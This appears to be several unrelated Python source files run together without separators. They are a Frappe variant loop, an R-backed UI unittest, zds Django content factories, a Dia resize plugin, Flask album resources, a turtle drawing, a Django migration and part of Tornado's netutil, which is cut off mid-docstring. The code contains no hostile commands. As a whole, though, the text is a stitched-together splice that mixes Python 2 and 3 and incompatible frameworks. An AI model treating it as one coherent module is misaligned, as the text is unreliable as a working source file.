		variant = frappe.get_doc("Item", variant_name)
		copy_attributes_to_variant(template, variant)
		variant.save()
		if publish_progress:
			frappe.publish_progress(done*100/total, title = _("Updating Variants..."))

import unittest
import os
from ui import main

# Show where the test run is executing from (Python 2 print statement).
print os.getcwd()

class TestMain(unittest.TestCase):
    """Smoke tests for ui.main.MainWindow (legacy Python 2 suite: uses xrange)."""

    def setUp(self):
        # Fresh main window per test. NOTE(review): presumably needs a GUI
        # environment and a working R session — confirm before running headless.
        self.m = main.MainWindow()

    def test_mainWindow(self):
        """The window object should be truthy once constructed."""
        assert(self.m)

    def test_dataframe(self):
        """Rendering a numpy matrix should register an active R object."""
        import numpy
        #Random 25x4 Numpy Matrix
        self.m.render_dataframe(numpy.random.rand(25,4) ,name='devel',rownames=xrange(0,25))
        assert(self.m.active_robject)
        assert(self.m.active_robject.columns)
        assert(self.m.active_robject.column_data)

    def test_imports(self):
        """Loading built-in R datasets should make them visible after a sync."""
        datasets = ['iris','Nile','morley','freeny','sleep','mtcars']
        for a in datasets:
            main.rsession.r('%s=%s' % (a,a))
            self.m.sync_with_r()
            assert(a in self.m.robjects)
                
# Run the suite when this module is executed.
unittest.main()
from datetime import datetime

import factory

from zds.forum.factories import PostFactory, TopicFactory
from zds.gallery.factories import GalleryFactory, UserGalleryFactory
from zds.utils.factories import LicenceFactory, SubCategoryFactory
from zds.utils.models import Licence
from zds.tutorialv2.models.database import PublishableContent, Validation, ContentReaction
from zds.tutorialv2.models.versioned import Container, Extract
from zds.tutorialv2.publication_utils import publish_content
from zds.tutorialv2.utils import init_new_repo

# Short placeholder markdown body used by the factories below ("light" mode).
text_content = "Ceci est un texte bidon, **avec markown**"

# Longer body full of image links (valid, broken, unusual formats) used to
# exercise image handling during publication (factories with light=False).
tricky_text_content = (
    "Ceci est un texte contenant plein d'images, pour la publication. Le modifier affectera le test !\n\n"
    "# Les images\n\n"
    "Image: ![PNG qui existe](https://upload.wikimedia.org/wikipedia/commons/2/24/"
    "Derivative_of_medical_imaging.jpg)\n\n"
    "Image: ![PNG qui existe pas](example.com/test.png)\n\n"
    "Image: ![SVG qui existe](https://upload.wikimedia.org/wikipedia/commons/f/f9/10DF.svg)\n\n"
    "Image: ![SVG qui existe pas](example.com/test.svg)\n\n"
    "Image: ![GIF qui existe](https://upload.wikimedia.org/wikipedia/commons/2/27/AnimatedStar.gif)\n\n"
    "Image: ![GIF qui existe pas](example.com/test.gif)\n\n"
    "Image: ![Image locale qui existe pas](does-not-exist/test.png)\n\n"
    "Image: ![Bonus: image bizarre](https://s2.qwant.com/thumbr/300x0/e/7/"
    "56e2a2bdcd656d0b8a29c650116e29e893239089f71adf128d5f06330703b1/1024px-"
    "Oh_my_darling.jpg?u=https%3A%2F%2Fupload"
    ".wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2Fa%2Fa9%2FOh_my_darling.jpg%2F1024px-"
    "Oh_my_darling.jpg&q=0&b=0&p=0&a=0)\n\n"
    "Image: ![Bonus: le serveur existe pas !](http://unknown.image.zds/test.png)\n\n"
    "Image: ![Bonus: juste du texte](URL invalide)\n\n"
    "# Et donc ...\n\n"
    "Voilà :)"
)


class PublishableContentFactory(factory.django.DjangoModelFactory):
    """
    Factory that creates a PublishableContent.
    """

    class Meta:
        model = PublishableContent

    title = factory.Sequence("Mon contenu No{}".format)
    description = factory.Sequence("Description du contenu No{}".format)
    type = "TUTORIAL"
    # NOTE(review): datetime.now() is evaluated once at import time, so every
    # instance shares the same dates — confirm this is intended
    # (factory.LazyFunction(datetime.now) would evaluate per instance).
    creation_date = datetime.now()
    pubdate = datetime.now()

    @classmethod
    def _generate(cls, create, attrs):
        """Create the content plus its gallery, licence, authors and git repo.

        Extra keyword arguments understood (and stripped before the model is
        created): ``light`` (short text instead of the image-heavy one),
        ``author_list``, ``add_license`` and ``add_category``.
        """
        # These parameters are only used inside _generate() and won't be saved in the database,
        # which is why we use attrs.pop() (they are removed from attrs).
        light = attrs.pop("light", True)
        author_list = attrs.pop("author_list", None)
        add_license = attrs.pop("add_license", True)
        add_category = attrs.pop("add_category", True)

        # This parameter will be saved in the database,
        # which is why we use attrs.get() (it stays in attrs).
        licence = attrs.get("licence", None)

        auths = author_list or []
        if add_license:
            # Accept either a Licence instance or a licence title (str);
            # fall back to the first Licence in the DB, then to a new one.
            given_licence = licence or Licence.objects.first()
            if isinstance(given_licence, str) and given_licence:
                given_licence = Licence.objects.filter(title=given_licence).first() or Licence.objects.first()
            licence = given_licence or LicenceFactory()

        text = text_content
        if not light:
            # The "tricky" text exercises image handling during publication.
            text = tricky_text_content

        publishable_content = super()._generate(create, attrs)
        publishable_content.gallery = GalleryFactory()
        publishable_content.licence = licence
        for auth in auths:
            publishable_content.authors.add(auth)

        if add_category:
            publishable_content.subcategory.add(SubCategoryFactory())

        publishable_content.save()

        # Every author needs write access to the content's gallery.
        for author in publishable_content.authors.all():
            UserGalleryFactory(user=author, gallery=publishable_content.gallery, mode="W")

        init_new_repo(publishable_content, text, text)

        return publishable_content


class ContainerFactory(factory.Factory):
    """
    Factory that creates a Container.
    """

    class Meta:
        model = Container

    title = factory.Sequence(lambda n: "Mon container No{}".format(n + 1))

    @classmethod
    def _generate(cls, create, attrs):
        """Create a container inside ``parent`` and return it.

        Extra keyword arguments: ``db_object`` (object whose ``sha_draft``
        is updated with the sha returned by the repo operation) and
        ``light`` (short text instead of the image-heavy one).
        """
        # These parameters are only used inside _generate() and won't be saved in the database,
        # which is why we use attrs.pop() (they are removed from attrs).
        db_object = attrs.pop("db_object", None)
        light = attrs.pop("light", True)

        # This parameter will be saved in the database,
        # which is why we use attrs.get() (it stays in attrs).
        parent = attrs.get("parent", None)

        # Needed because we use container.title later
        container = super()._generate(create, attrs)

        text = text_content
        if not light:
            text = tricky_text_content

        # repo_add_container returns a sha; the container actually attached
        # to the tree is the parent's freshly appended last child.
        sha = parent.repo_add_container(container.title, text, text)
        container = parent.children[-1]

        if db_object:
            db_object.sha_draft = sha
            db_object.save()

        return container


class ExtractFactory(factory.Factory):
    """
    Factory that creates an Extract.
    """

    class Meta:
        model = Extract

    title = factory.Sequence(lambda n: "Mon extrait No{}".format(n + 1))

    @classmethod
    def _generate(cls, create, attrs):
        """Create an extract inside ``container`` and return it.

        Extra keyword arguments: ``db_object`` (object whose ``sha_draft``
        is updated with the sha returned by the repo operation) and
        ``light`` (short text instead of the image-heavy one).
        """
        # These parameters are only used inside _generate() and won't be saved in the database,
        # which is why we use attrs.pop() (they are removed from attrs).
        light = attrs.pop("light", True)
        db_object = attrs.pop("db_object", None)

        # This parameter will be saved in the database,
        # which is why we use attrs.get() (it stays in attrs).
        container = attrs.get("container", None)

        # Needed because we use extract.title later
        extract = super()._generate(create, attrs)

        parent = container
        text = text_content
        if not light:
            text = tricky_text_content

        # repo_add_extract returns a sha; the extract actually attached to
        # the tree is the parent's freshly appended last child.
        sha = parent.repo_add_extract(extract.title, text)
        extract = parent.children[-1]

        if db_object:
            db_object.sha_draft = sha
            db_object.save()

        return extract


class ContentReactionFactory(factory.django.DjangoModelFactory):
    """
    Factory that creates a ContentReaction.
    """

    class Meta:
        model = ContentReaction

    ip_address = "192.168.3.1"
    text = "Bonjour, je me présente, je m'appelle l'homme au texte bidonné"

    @classmethod
    def _generate(cls, create, attrs):
        """Create the note and register it as its content's latest note."""
        note = super()._generate(create, attrs)
        note.pubdate = datetime.now()
        note.save()
        # Keep the parent content's "last note" pointer up to date.
        note.related_content.last_note = note
        note.related_content.save()
        return note


class BetaContentFactory(PublishableContentFactory):
    """
    Factory that creates a PublishableContent with a beta version and a beta topic.
    """

    @classmethod
    def _generate(cls, create, attrs):
        """Create the content, then open a beta topic in ``forum`` for it.

        The beta topic (and the beta sha) is only created when a ``forum``
        is given and the content has at least one author.
        """
        # This parameter is only used inside _generate() and won't be saved in the database,
        # which is why we use attrs.pop() (it is removed from attrs).
        beta_forum = attrs.pop("forum", None)

        # Creates the PublishableContent (see PublishableContentFactory._generate() for more info)
        publishable_content = super()._generate(create, attrs)

        if publishable_content.authors.count() > 0 and beta_forum is not None:
            beta_topic = TopicFactory(
                title="[beta]" + publishable_content.title, author=publishable_content.authors.first(), forum=beta_forum
            )
            # The beta version is the current draft version.
            publishable_content.sha_beta = publishable_content.sha_draft
            publishable_content.beta_topic = beta_topic
            publishable_content.save()
            PostFactory(topic=beta_topic, position=1, author=publishable_content.authors.first())
            beta_topic.save()
        return publishable_content


class PublishedContentFactory(PublishableContentFactory):
    """
    Factory that creates a PublishableContent and then publishes it.
    """

    @classmethod
    def _generate(cls, create, attrs):
        """Create the content and publish its current draft version.

        Extra keyword argument: ``is_major_update`` (default True), passed
        through to ``publish_content``.
        """
        # This parameter is only used inside _generate() and won't be saved in the database,
        # which is why we use attrs.pop() (it is removed from attrs).
        is_major_update = attrs.pop("is_major_update", True)

        # Creates the PublishableContent (see PublishableContentFactory._generate() for more info)
        content = super()._generate(create, attrs)

        published = publish_content(content, content.load_version(), is_major_update)
        # The public version is the draft version that was just published.
        content.sha_public = content.sha_draft
        content.public_version = published

        content.save()

        return content


class ValidationFactory(factory.django.DjangoModelFactory):
    """
    Factory that creates a Validation.
    """

    # No declared fields: all values come from the model defaults or from
    # keyword arguments supplied at the call site.
    class Meta:
        model = Validation

#
# -*- coding: utf-8 -*-
# Dia Group Resize Plugin
# Copyright (c) 2015, Alexandre Machado <axmachado@gmail.com>
# 
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#

import sys, dia
import os
import pygtk
pygtk.require("2.0")
import gtk
import locale

class ResizeWindow(object):
    """GTK dialog that resizes the elements of a selected Dia object group.

    Width and height can each independently be left unchanged, shrunk to the
    group's smallest value, enlarged to its largest, or set to a value typed
    by the user.
    """

    def __init__(self, group, data):
        # group: the selected dia objects; data: the diagram data they belong to.
        self.group = group
        self.data = data
        self.initWindow()

    def initWindow(self):
        """Build the non-modal dialog with Apply and Close buttons."""
        self.dlg = gtk.Dialog()
        self.dlg.set_title('Group Resize')
        self.dlg.set_border_width(6)
        self.dlg.vbox.pack_start(self.dialogContents(), fill=True, expand=True, padding=5)
        self.dlg.add_button(gtk.STOCK_APPLY, gtk.RESPONSE_APPLY)
        self.dlg.add_button(gtk.STOCK_CLOSE, gtk.RESPONSE_CLOSE)
        self.dlg.set_has_separator(True)
        self.dlg.set_modal(False)
        # Close only hides the window (so it can be re-shown); Apply resizes.
        self.dlg.get_widget_for_response(gtk.RESPONSE_CLOSE).connect("clicked", self.hide, None)
        self.dlg.get_widget_for_response(gtk.RESPONSE_APPLY).connect("clicked", self.clickAplicar, None)

    def dimensionsFrame(self, label):
        """Return (frame, options) for one dimension.

        ``options`` maps 'ignore'/'smallest'/'largest'/'specify' to their
        radio buttons and 'value' to the entry used with 'specify'.
        """
        frame = gtk.Frame(label)
        table = gtk.Table(rows=4, columns=2)
        ignore = gtk.RadioButton(group=None, label="do not change")
        ignore.show()
        smallest = gtk.RadioButton(group=ignore, label="shrink to smallest")
        smallest.show()
        largest = gtk.RadioButton(group=ignore, label="enlarge to largest")
        largest.show()
        specify = gtk.RadioButton(group=ignore, label="resize to:")
        specify.show()
        value = gtk.Entry()
        value.show()
        # The entry is only sensitive while "resize to:" is selected.
        specify.connect("toggled", self.enableValueEntry, value)
        self.enableValueEntry(specify, value)
        table.attach (ignore, 0, 1, 0, 1)
        table.attach (smallest, 0, 1, 1, 2)
        table.attach (largest, 0, 1, 2, 3)
        table.attach (specify, 0, 1, 3, 4)
        table.attach (value, 1, 2, 3, 4)
        frame.add(table)
        table.show()
        frame.show()

        options = {
            'ignore': ignore,
            'smallest': smallest,
            'largest': largest,
            'specify': specify,
            'value': value
        }
        return frame, options

    def enableValueEntry(self, radioSpecify, entrySpecify, *args):
        # Keep the entry's sensitivity in sync with the "specify" radio.
        entrySpecify.set_sensitive(radioSpecify.get_active())

    def contentsFrameWidth(self):
        """Build the Width frame and remember its option widgets."""
        frame, self.widthOptions = self.dimensionsFrame('Width')
        return frame

    def contentsFrameHeight(self):
        """Build the Height frame and remember its option widgets."""
        frame, self.heightOptions = self.dimensionsFrame('Height')
        return frame

    def dialogContents(self):
        """Return the dialog body: Width and Height frames stacked vertically."""
        contents = gtk.VBox(spacing=5)
        contents.pack_start(self.contentsFrameWidth(), fill=True, expand=True)
        contents.pack_start(self.contentsFrameHeight(), fill=True, expand=True)
        contents.show()
        return contents

    def getSelectedGroupOption(self, options):
        """Return (option_name, entry_text) for the active radio in ``options``."""
        value = options['value'].get_text()
        for opt in 'ignore', 'smallest', 'largest', 'specify':
            if options[opt].get_active():
                return (opt,value)
        return ('ignore',value)

    def getValue(self, opt, value, elProperty):
        """Resolve the target size for ``elProperty`` ('elem_width'/'elem_height')."""
        if opt == 'specify':
            return self.toFloat(value)
        else:
            # Collect the property from every object that has it (py2 has_key).
            values = [ x.properties[elProperty].value for x in self.group if x.properties.has_key(elProperty) ]
            if opt == 'smallest':
                return min(values)
            else:
                return max(values)

    def adjustWidth(self, value):
        """Set each element's width to ``value``, restoring its position after."""
        for obj in self.group:
            pos = obj.properties['obj_pos'].value
            if obj.properties.has_key("elem_width"):
                difference = value - obj.properties['elem_width'].value
                # handles[3]/handles[4]: presumably the left/right edge
                # handles — TODO confirm against the Dia handle layout.
                handleLeft = obj.handles[3]
                handleRight = obj.handles[4]
                # Move each handle outward by half the difference.
                amount = difference/2
                obj.move_handle(handleLeft, (handleLeft.pos.x - amount, handleLeft.pos.y), 0, 0)
                obj.move_handle(handleRight, (handleRight.pos.x + amount, handleRight.pos.y), 0, 0)
                # Restore the original object position after resizing.
                obj.move(pos.x, pos.y)

    def adjustHeight(self, value):
        """Set each element's height to ``value``, restoring its position after."""
        for obj in self.group:
            pos = obj.properties['obj_pos'].value
            if obj.properties.has_key("elem_height"):
                difference = value - obj.properties['elem_height'].value
                # handles[1]/handles[6]: presumably the top/bottom edge
                # handles — TODO confirm against the Dia handle layout.
                handleTop = obj.handles[1]
                handleBottom = obj.handles[6]
                amount = difference/2
                obj.move_handle(handleTop, (handleTop.pos.x, handleTop.pos.y - amount), 0, 0)
                obj.move_handle(handleBottom, (handleBottom.pos.x, handleBottom.pos.y + amount), 0, 0)
                obj.move(pos.x, pos.y)


    def toFloat(self, valor):
        # Locale-aware parse: accepts the user's decimal separator.
        return locale.atof(valor)

    def clickAplicar(self, *args):
        """Apply the selected resize options to the group ("Aplicar" = Apply)."""
        optWidth = self.getSelectedGroupOption(self.widthOptions)
        optHeight = self.getSelectedGroupOption(self.heightOptions)

        try:
            if optWidth[0] != 'ignore':
                width = self.getValue(optWidth[0], optWidth[1], 'elem_width')
                self.adjustWidth(width)
            if optHeight[0] != 'ignore':
                height = self.getValue(optHeight[0], optHeight[1], 'elem_height')
                self.adjustHeight(height)

            if dia.active_display():
                diagram = dia.active_display().diagram
                for obj in self.group:
                    diagram.update_connections(obj)

        except Exception,e:
            # Report any error (e.g. an unparsable number) in a message box.
            dia.message(gtk.MESSAGE_ERROR, repr(e))

        if dia.active_display():
            dia.active_display().add_update_all()
            dia.active_display().flush()


    def show(self):
        self.dlg.show()

    def hide(self, *args):
        self.dlg.hide()

    def run(self):
        return self.dlg.run()
        
def dia_group_resize_db (data,flags):
    """Menu callback: open the resize dialog for the current selection."""
    selection = dia.active_display().diagram.get_sorted_selected()
    if selection:
        ResizeWindow(selection, data).show()
    else:
        dia.message(gtk.MESSAGE_INFO, "Please select a group of objects")

# Hook the plugin into Dia's Objects menu.
dia.register_action("ObjectGroupResize", "Group Resize",
                    "/DisplayMenu/Objects/ObjectsExtensionStart",
                    dia_group_resize_db)

from ..models import Album
from ..resource import SingleResource, ListResource
from ..schemas import AlbumSchema


class SingleAlbum(SingleResource):
    """REST resource exposing one Album, looked up by its integer id."""
    schema = AlbumSchema()
    routes = ('/album/<int:id>/',)
    model = Album


class ListAlbums(ListResource):
    """REST resource listing all Albums; also served under '/tracklist/'."""
    schema = AlbumSchema(many=True)
    routes = ('/album/', '/tracklist/')
    model = Album

"""
System plugin
Copyright (C) 2016 Walid Benghabrit

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""
from accmon.plugins.plugin import *


class System(Plugin):
    """System plugin: currently delegates all request handling to Plugin.

    The redundant ``__init__`` (which only called ``super().__init__()``)
    has been removed, and the mixed ``super(System, self)`` /``super()``
    call styles unified to the py3 form already used in this file.
    """

    def handle_request(self, request):
        """Handle a plugin HTTP request.

        Returns the base class's response when it produced one; otherwise
        falls through and returns None (request not handled here).
        """
        res = super().handle_request(request)
        if res is not None:
            return res

#!/usr/bin/env python
import turtle
import random

def bloom(radius):
    """Draw rings of randomly tinted filled circles around the global turtle.

    For each arc size (40 down to 15 in steps of 5) the turtle steps around
    a circle of radius ``radius + rad`` and fills a small circle at each
    stop, with a near-white random color.
    """
    turtle.colormode(255)

    for rad in range(40, 10, -5):
        petals = 360 // rad
        for _ in range(petals):
            # Advance along the big circle without drawing.
            turtle.up()
            turtle.circle(radius + rad, rad)
            turtle.begin_fill()
            tint = tuple(200 + random.randint(0, rad) for _ in range(3))
            turtle.fillcolor(tint)
            turtle.down()
            turtle.circle(-rad)
            turtle.end_fill()


def main():
    """Simple flower, using global turtle instance"""
    turtle.speed(0)        # fastest drawing speed
    turtle.colormode(1.0)  # bloom() switches the mode to 255 itself
    bloom(5)
    turtle.exitonclick()   # keep the window open until clicked

###

if __name__ == "__main__":
    main()

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):
    """Auto-generated migration: adds the CharacterSpells model (character +
    M2M spells), Swedish verbose names for the spell models, and
    SpellInfo.name / a non-null SpellInfo.parent FK."""

    dependencies = [
        ('characters', '0011_auto_20160212_1144'),
    ]

    operations = [
        migrations.CreateModel(
            name='CharacterSpells',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('character', models.ForeignKey(verbose_name='Karakt\xe4r', to='characters.Character')),
            ],
            options={
                'verbose_name': 'Karakt\xe4rers magi',
                'verbose_name_plural': 'Karakt\xe4rers magi',
            },
        ),
        migrations.AlterModelOptions(
            name='spellextras',
            options={'verbose_name': 'Magi extra', 'verbose_name_plural': 'Magi extra'},
        ),
        migrations.AlterModelOptions(
            name='spellinfo',
            options={'verbose_name': 'Magi information', 'verbose_name_plural': 'Magi information'},
        ),
        migrations.AddField(
            model_name='spellinfo',
            name='name',
            field=models.CharField(default='Magins namn', max_length=256, verbose_name='Namn'),
        ),
        migrations.AlterField(
            model_name='spellinfo',
            name='parent',
            field=models.ForeignKey(verbose_name='Tillh\xf6righet', to='characters.SpellParent'),
        ),
        migrations.AddField(
            model_name='characterspells',
            name='spells',
            field=models.ManyToManyField(to='characters.SpellInfo', verbose_name='Magier och besv\xe4rjelser'),
        ),
    ]

#!/usr/bin/env python
#
# Copyright 2011 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

"""Miscellaneous network utility code."""

from __future__ import absolute_import, division, print_function, with_statement

import errno
import os
import re
import socket
import ssl
import stat

from lib.tornado.concurrent import dummy_executor, run_on_executor
from lib.tornado.ioloop import IOLoop
from lib.tornado.platform.auto import set_close_exec
from lib.tornado.util import Configurable


def bind_sockets(port, address=None, family=socket.AF_UNSPEC, backlog=128, flags=None):
    """Creates listening sockets bound to the given port and address.

    Returns a list of socket objects (multiple sockets are returned if
    the given address maps to multiple IP addresses, which is most common
    for mixed IPv4 and IPv6 use).

    Address may be either an IP address or hostname.  If it's a hostname,
    the server will listen on all IP addresses associated with the
    name.  Address may be an empty string or None to listen on all
    available interfaces.  Family may be set to either `socket.AF_INET`
    or `socket.AF_INET6` to restrict to IPv4 or IPv6 addresses, otherwise
    both will be used if available.

    The ``backlog`` argument has the same meaning as for
    `socket.listen() <socket.socket.listen>`.

    ``flags`` is a bitmask of AI_* flags to `~socket.getaddrinfo`, like
    ``socket.AI_PASSIVE | socket.AI_NUMERICHOST``.
    """
    sockets = []
    if address == "":
        address = None
    if not socket.has_ipv6 and family == socket.AF_UNSPEC:
        # Python can be compiled with --disable-ipv6, which causes
        # operations on AF_INET6 sockets to fail, but does not
        # automatically exclude those results from getaddrinfo
        # results.
        # http://bugs.python.org/issue16208
        family = socket.AF_INET
    if flags is None:
        flags = socket.AI_PASSIVE
    # set() de-duplicates: getaddrinfo can return identical entries.
    for res in set(socket.getaddrinfo(address, port, family, socket.SOCK_STREAM,
                                      0, flags)):
        af, socktype, proto, canonname, sockaddr = res
        sock = socket.socket(af, socktype, proto)
        set_close_exec(sock.fileno())
        # SO_REUSEADDR has different (unsafe) semantics on Windows, so it
        # is only set on non-Windows platforms.
        if os.name != 'nt':
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        if af == socket.AF_INET6:
            # On linux, ipv6 sockets accept ipv4 too by default,
            # but this makes it impossible to bind to both
            # 0.0.0.0 in ipv4 and :: in ipv6.  On other systems,
            # separate sockets *must* be used to listen for both ipv4
            # and ipv6.  For consistency, always disable ipv4 on our
            # ipv6 sockets and use a separate ipv4 socket when needed.
            #
            # Python 2.x on windows doesn't have IPPROTO_IPV6.
            if hasattr(socket, "IPPROTO_IPV6"):
                sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
        # Non-blocking: accept() is driven by the IOLoop (see add_accept_handler).
        sock.setblocking(0)
        sock.bind(sockaddr)
        sock.listen(backlog)
        sockets.append(sock)
    return sockets

if hasattr(socket, 'AF_UNIX'):
    def bind_unix_socket(file, mode=0o600, backlog=128):
        """Creates a listening unix socket.

        If a socket with the given name already exists, it will be deleted.
        If any other file with that name exists, an exception will be
        raised.

        Returns a socket object (not a list of socket objects like
        `bind_sockets`)
        """
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        set_close_exec(sock.fileno())
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.setblocking(0)
        try:
            st = os.stat(file)
        except OSError as err:
            # ENOENT is the normal case: nothing at that path yet.
            if err.errno != errno.ENOENT:
                raise
        else:
            if stat.S_ISSOCK(st.st_mode):
                # Stale socket from a previous run: replace it.
                os.remove(file)
            else:
                # Bug fix: the message was previously passed as a tuple
                # ("File %s ...", file) instead of being %-formatted.
                raise ValueError("File %s exists and is not a socket" % file)
        sock.bind(file)
        os.chmod(file, mode)
        sock.listen(backlog)
        return sock


def add_accept_handler(sock, callback, io_loop=None):
    """Adds an `.IOLoop` event handler to accept new connections on ``sock``.

    When a connection is accepted, ``callback(connection, address)`` will
    be run (``connection`` is a socket object, and ``address`` is the
    address of the other end of the connection).  Note that this signature
    is different from the ``callback(fd, events)`` signature used for
    `.IOLoop` handlers.
    """
    if io_loop is None:
        io_loop = IOLoop.current()

    def accept_handler(fd, events):
        # Accept in a loop: one readiness event may cover several queued
        # connections, and the listening socket is non-blocking.
        while True:
            try:
                connection, address = sock.accept()
            except socket.error as e:
                # EWOULDBLOCK/EAGAIN mean the accept queue is drained.
                if e.args[0] in (errno.EWOULDBLOCK, errno.EAGAIN):
                    return
                raise
            callback(connection, address)
    io_loop.add_handler(sock.fileno(), accept_handler, IOLoop.READ)


def is_valid_ip(ip):
    """Returns true if the given string is a well-formed IP address.

    Supports IPv4 and IPv6.
    """
    if not ip or '\x00' in ip:
        # getaddrinfo resolves empty strings to localhost, and truncates
        # on zero bytes — reject both up front.
        return False
    try:
        res = socket.getaddrinfo(ip, 0, socket.AF_UNSPEC,
                                 socket.SOCK_STREAM,
                                 0, socket.AI_NUMERICHOST)
        return bool(res)
    except socket.gaierror as e:
        if e.args[0] == socket.EAI_NONAME:
            return False
        raise
    # (unreachable "return True" after try/except removed)


class Resolver(Configurable):
    """Configurable asynchronous DNS resolver interface.

    By default, a blocking implementation is used (which simply calls
    `socket.getaddrinfo`).  An alternative implementation can be
    chosen with the `Resolver.configure <.Configurable.configure>`
    class method::

        Resolver.configure('tornado.netutil.ThreadedResolver')

    The implementations of this interface included with Tornado are

    * `tornado.netutil.BlockingResolver`
    * `tornado.netutil.ThreadedResolver`
    * `tornado.netutil.OverrideResolver`
    * `tornado.platform.twisted.TwistedResolver`
    * `tornado.platform.caresresolver.CaresResolver`
    """
    @classmethod
    def configurable_base(cls):
        # All resolver implementations share this class as the
        # configuration root.
        return Resolver

    @classmethod
    def configurable_default(cls):
        # Implementation used when none has been configured explicitly.
        return BlockingResolver

    def resolve(self, host, port, family=socket.AF_UNSPEC, callback=None):
        """Resolves an address.

        The ``host`` argument is a string which may be a hostname or a
        literal IP address.

        Returns a `.Future` whose result is a list of (family,
        address) pairs, where address is a tuple suitable to pass to
        `socket.connect <socket.socket.connect>` (i.e. a ``(host,
        port)`` pair for IPv4; additional fields may be present for
        IPv6). If a ``callback`` is passed, it will be run with the
        result as an argument when it is complete.
        """
        raise NotImplementedError()


class ExecutorResolver(Resolver):
    """Resolver that performs `socket.getaddrinfo` lookups on an executor.

    Defaults to ``dummy_executor`` when no executor is given; pass a
    thread pool for off-IOLoop resolution.
    """
    def initialize(self, io_loop=None, executor=None):
        self.io_loop = io_loop or IOLoop.current()
        self.executor = executor or dummy_executor

    @run_on_executor
    def resolve(self, host, port, family=socket.AF_UNSPEC):
        # Reduce each getaddrinfo entry to the (family, sockaddr) pair
        # callers need.
        return [(fam, sockaddr)
                for fam, socktype, proto, canonname, sockaddr
                in socket.getaddrinfo(host, port, family)]


class BlockingResolver(ExecutorResolver):
    """Default `Resolver` implementation, using `socket.getaddrinfo`.

    Resolution blocks the `.IOLoop`, but the callback is still deferred
    to the next `.IOLoop` iteration.
    """
    def initialize(self, io_loop=None):
        # No executor argument: ExecutorResolver then uses dummy_executor,
        # which runs the work inline.
        super(BlockingResolver, self).initialize(io_loop=io_loop)


class ThreadedResolver(ExecutorResolver):
    """Multithreaded non-blocking `Resolver` implementation.

    Requires the `concurrent.futures` package (in the standard library
    since Python 3.2; ``pip install futures`` on older versions).

    The thread pool size can be configured with::

        Resolver.configure('tornado.netutil.ThreadedResolver',
                           num_threads=10)
    """
    def initialize(self, io_loop=None, num_threads=10):
        # Imported lazily so the module is usable without the backport.
        from concurrent.futures import ThreadPoolExecutor
        pool = ThreadPoolExecutor(num_threads)
        super(ThreadedResolver, self).initialize(io_loop=io_loop,
                                                 executor=pool)


class OverrideResolver(Resolver):
    """Resolver wrapper that consults an override mapping first.

    Useful for local DNS changes (e.g. in tests) without modifying
    system-wide settings.  Mapping keys may be plain host strings or
    ``(host, port)`` pairs.
    """
    def initialize(self, resolver, mapping):
        self.resolver = resolver
        self.mapping = mapping

    def resolve(self, host, port, *args, **kwargs):
        # A (host, port) override takes precedence over a bare-host one.
        pair = (host, port)
        if pair in self.mapping:
            host, port = self.mapping[pair]
        elif host in self.mapping:
            host = self.mapping[host]
        return self.resolver.resolve(host, port, *args, **kwargs)


# These are the keyword arguments to ssl.wrap_socket that must be translated
# to their SSLContext equivalents (the other arguments are still passed
# to SSLContext.wrap_socket).
# Used by ssl_options_to_context to validate the dict form of ssl_options.
_SSL_CONTEXT_KEYWORDS = frozenset(['ssl_version', 'certfile', 'keyfile',
                                   'cert_reqs', 'ca_certs', 'ciphers'])


def ssl_options_to_context(ssl_options):
    """Try to convert an ``ssl_options`` dictionary to an
    `~ssl.SSLContext` object.

    The dict form holds keyword arguments for `ssl.wrap_socket`.  On
    Python 3.2+ an `ssl.SSLContext` can be used instead; this helper
    upgrades the dict form to its `~ssl.SSLContext` equivalent so that
    callers can rely on context-only features such as SNI or NPN.
    """
    if isinstance(ssl_options, dict):
        # Only keywords with SSLContext equivalents are accepted here.
        assert all(k in _SSL_CONTEXT_KEYWORDS for k in ssl_options), ssl_options
    # Pass through unchanged when contexts are unsupported, or when the
    # caller already supplied one.
    if not hasattr(ssl, 'SSLContext') or isinstance(ssl_options, ssl.SSLContext):
        return ssl_options
    ctx = ssl.SSLContext(
        ssl_options.get('ssl_version', ssl.PROTOCOL_SSLv23))
    if 'certfile' in ssl_options:
        ctx.load_cert_chain(ssl_options['certfile'],
                            ssl_options.get('keyfile', None))
    if 'cert_reqs' in ssl_options:
        ctx.verify_mode = ssl_options['cert_reqs']
    if 'ca_certs' in ssl_options:
        ctx.load_verify_locations(ssl_options['ca_certs'])
    if 'ciphers' in ssl_options:
        ctx.set_ciphers(ssl_options['ciphers'])
    return ctx


def ssl_wrap_socket(socket, ssl_options, server_hostname=None, **kwargs):
    """Returns an ``ssl.SSLSocket`` wrapping the given socket.

    ``ssl_options`` may be either a dictionary (as accepted by
    `ssl_options_to_context`) or an `ssl.SSLContext` object.  Extra
    keyword arguments are forwarded to ``wrap_socket`` (the
